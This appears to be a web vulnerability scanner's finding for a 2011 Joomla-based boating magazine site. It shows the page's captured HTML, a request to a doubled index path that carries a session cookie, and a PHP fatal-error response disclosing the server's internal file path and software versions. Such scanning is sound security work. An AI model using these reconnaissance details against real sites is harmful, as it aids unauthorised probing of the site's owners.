Last-Modified: Tue, 25 Jan 2011 02:46:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/features/technical" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Technical Articles About Boat Motors and More</title> <link href="/features/technical?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/features/technical?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_features c_uncategorized m_uncategorized"><!--
Type of page: category<br />Section: 5, s_features<br />Category: 162, c_uncategorized<br />Menu: 162, m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publications</span></a></li><li class="item104"&g..
- /index.php/index.php

/index.php/index.php

http://www.soundingsonline.com/index.php/index.php

Identified Internal Path(s)

E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php

Request

GET /index.php/index.php HTTP/1.1
Referer: http://www.soundingsonline.com/index.php/subscription-services
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html


<br /><b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php</b> on line <b>221</b><br />